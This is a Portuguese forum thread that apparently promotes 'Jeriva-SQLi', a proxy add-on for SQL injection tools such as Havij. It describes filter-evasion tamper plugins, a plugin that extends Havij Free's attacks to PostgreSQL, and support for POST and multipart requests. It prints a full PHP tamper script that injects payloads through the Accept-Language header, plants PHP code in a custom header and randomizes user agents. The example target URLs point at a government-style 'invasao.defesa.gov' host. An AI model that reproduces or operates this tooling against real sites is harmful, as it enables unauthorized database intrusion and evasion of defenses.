Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Projeto Jerivá-SQLi

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    Plugins Tamper de evasão

    Plugins Tamper de evasão usados em SQL Injection usando o Jeriva-SQLi 6.0

    (Substitua espaços por /**/, /*--*/, \t, \r\n)


    Exemplo
    http://jeriva-sqli/?http://site-alvo/id=$Inject_Here$&Inject_Tamper=replace_with_rand&I nject_Here=1

    Troca ' ' por '/**/' ou '/*--*/' ou '\t' ou '\r\n'

    Exemplo: 'SELECT id FROM tabela' resultado 'SELECT/*--*/id FROM/**/tabela'


    Obtenha o plugin de evasão em Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Fonte: Twitter @jerivasqli

    Comment


    • Font Size
      #17
      Jeriva-SQLi 7.0

      A nova versão do Jeriva-SQLi implementa duas novas caracteristicas.
      • Navegação Anônima utilizando proxy
      • Adulteração do cabeçalho HTTP


      Navegação anônima utilizando proxy permite que você utilize ferramentas que tenham ou não suporte nativo a este tipo de navegação. Por exemplo: Admin Control Panel Finder v2.1.4

      A adulteração de cabeçalho HTTP é interessante quando queremos remover, alterar ou adicionar informações.

      Imagine que você encontre uma possível falha de SQLi, RFI, LFI no campo "Accept-Language" do site alvo e deseja utilizar uma ferramenta que explora este tipo de falha, mas não a nível de Cabeçalho HTTP. Então esta aqui a sua solução.

      Basta criar um script tamper, e invocar ele.

      Veja o exemplo do script change_header

      Código PHP:
      <?php
          
      // Arquivo: change_header.php
          // Versão.: 1.0
          // Data: 28/08/2011    - 08:40 am
          //    
          // Exemplo
          // http://jeriva-sqli/?http://invasao.defesa.gov/index.php?id=$Inject_Here$&Inject_Tamper=change_header&Inject_Here=1
          //
          // Métodos para manipular os campos do Cabecalho (Header)
          // ------------------------------------------------------
          // setHeader( Campo , valor )  <--- Se o campo já existir ele apenas será substituido caso contrário será criado
          // unsetHeader( Campo ) <-- Remove o campo se este existir
          // getHeader() <--- Obtem um array com todos os campos e valores
          // getHeader( Campo ) <--- Obtem o valor do campo existente
          // 
          
          
      include("LIB_log.php");    

          Class 
      Tamper extends LIB_log
          
      {
              private 
      $obj;

              public function 
      __construct($obj)
              {
                  
      $this->obj $obj;
                  
      $this->config_log();
              }    

              function 
      init_Havij()
              {
                  
                  
      $str "";
                  foreach( 
      $this->obj->getHeader() as $key => $value)
                    
      $str .= "{$key}{$value}\r\n";
                  
                  
      $this->setLogar"[DATA/HORA] => ".date("d-m-Y - H:i:s")."\r\n\r\n" );
                  
      $this->setLogar"init_Havij\r\n" );
                  
      $this->setLogar"URL........ = {$this->obj->getURL()}\r\n" );
                  
      $this->setLogar"Inject_Here = {$this->obj->getInjectHere()}\r\n\r\n" );
                  
      $this->setLogar"Original Header\r\n" );
                  
      $this->setLogar"---------------\r\n" );
                  
      $this->setLogar$str."\r\n\r\n" );

                  
      // Change Headers
                  
      $this->obj->setHeader("My-header-exploit""<?php echo 'hello world!'; ?>");
                  
      $this->obj->setHeader("Accept""*/*");
                  
      $this->obj->setHeader("Accept-Language"$this->obj->getInjectHere() );
                  
      $this->obj->setHeader("User-Agent"$this->randomUserAgent() );
                  
      $this->obj->setHeader("Accept-Encoding""gzip, deflate");
                  
      $this->obj->unsetHeader("Connection");
                  
      $this->obj->unsetHeader("Cookie");
                  
                  
      $str "";
                  foreach( 
      $this->obj->getHeader() as $key => $value)
                    
      $str .= "{$key}{$value}\r\n";

                  
      // Log changes
                  
      $this->setLogar"Changed Header\r\n" );
                  
      $this->setLogar"--------------\r\n" );
                  
      $this->setLogar$str."\r\n\r\n" );

              }

              function 
      init_Jeriva()
              {
                  
      $this->saveLog("log/change_header.txt");            
              }        

              function 
      getBrowsers()
              {
                  return ( array(
      'Firefox','Safari','Opera','Flock','Internet Explorer','Seamonkey','Konqueror','GoogleBot') );
              }
              
              function 
      getOSs()
              {
                  return( array(
      'Windows 3.1','Windows 95','Windows 98','Windows 2000','Windows NT','Windows XP','Windows Vista','Redhat Linux','Ubuntu','Fedora','AmigaOS','OS 10.5') );
              }
              
              function 
      getLanguageCodes()
              {
                  return( array(
      "ar-AE","ar-BH","ar-DZ","ar-EG","ar-IQ","ar-JO","ar-KW","ar-LB","ar-LY","ar-MA","ar-OM","ar-QA","ar-SA","ar-SY","ar-TN","ar-YE","de-AT","de-CH","de-LI","de-LU","en-AU","en-BZ","en-CA","en-GB","en-IE","en-JM","en-NZ","en-TT","en-US","en-ZA","es-AR","es-BO","es-CL","es-CO","es-CR","es-DO","es-EC","es-GT","es-HN","es-MX","es-NI","es-PA","es-PE","es-PR","es-PY","es-SV","es-UY","es-VE","fr-BE","fr-CA","fr-CH","fr-LU","it-CH","nl-BE","pt-BR","ro-MO","ru-MO","sv-FI","zh-CN","zh-HK","zh-SG","zh-TW") );
              }
                      
              function 
      randomUserAgent()
              {
                
      //list of browsers
                
      $agentBrowser $this->getBrowsers();

                
      //list of operating systems
                
      $agentOS $this->getOSs();

                
      // list of language code
                
      $languageCode $this->getLanguageCodes();
                
                
      //randomly generate UserAgent
                
      return( $agentBrowser[rand(0,7)].'/'.rand(1,8).'.'.rand(0,9).' (' .$agentOS[rand(0,11)].' '.rand(1,7).'.'.rand(0,9).'; '.$languageCode[rand(0,30)].';)' );
              }
                              
          }
      ?>
      Obtenha a ultima versão do Jeriva-SQLi seguindo o projeto no Twitter @jerivasqli

      Comment


      • Font Size
        #18
        Havij FREE com suporte a POSTGRES!!!

        As versões FREE do Havij não suportavam o uso completo de SQL Injection no POSTGRES.

        Apenas detectavam o DB Postgres bem como a quantidade de colunas e o tipo da injeção de SQL.

        Agora com o plugin “error_mysql_to_postgres” que funciona na versão 6.0 do Jeriva-SQLi ou superior é possível contornar esta limitação.

        Após obter o plugin no twitter: @jerivasqli

        Basta descompactar ele dentro da pasta “tamper” do jeriva-sqli

        Como usar no Havij

        Target: hxxp://jeriva-sqli/?hxxp://invasao.defesa.gov/error-postgres.php?id=$Inject_Here$&Inject_Tamper=error_ mysql_to_postgres&Inject_Here=1

        IMPORTANTE: Você deve forçar o uso **** Database: MySQL error based

        *** Este plugin foi testado nas versões 1.4 e 1.5 do Havij Free

        Site do Projeto: itsafe.net.br

        Comment


        • Font Size
          #19
          Video Demostração - Havij FREE com suporte a POSTGRES!!!

          [ame]http://www.youtube.com/watch?v=kCiCvFBYgq0[/ame]

          Comment


          • Font Size
            #20
            Jeriva-SQLi 8 - Com suporte ao método POST e multipart/data-form

            Sua ferramenta de SQLi só permite realizar testes usando POST?

            E que tal usar POST Multipart!!!

            Se você não sabé do que estou falando veja o vídeo.

            Aqui estamos usando o Jeriva-Sqli8 + Havij 1.5 + Plugin Tamper "post_to_multipart"

            [ame]http://www.youtube.com/watch?v=PNK-9oGfXZg[/ame]

            Site do Projeto: itsafe.net.br

            Comment


            • Font Size
              #21
              Boa noite se interesse pelo projeto contudo mim deparo com um erro incomum a visto que ja busquei solucionalo e ainda assim não consegui deste modo venho pedir encarecidamente se alguem que conheça do projeto ou proprio desenvovedor possa mim ajudar,segue o screen do erro apresentado.





              Obrigado
              Mobille

              Comment


              • Font Size
                #22
                Postado Originalmente por mobillebest Ver Post
                Boa noite se interesse pelo projeto contudo mim deparo com um erro incomum a visto que ja busquei solucionalo e ainda assim não consegui deste modo venho pedir encarecidamente se alguem que conheça do projeto ou proprio desenvovedor possa mim ajudar,segue o screen do erro apresentado.





                Obrigado
                Mobille
                Caro, mobilebest

                Parece que o seu php não tem o suporte ao bcompiller para carregar o bytecode e rodar.

                Comment

                X
                Working...
                X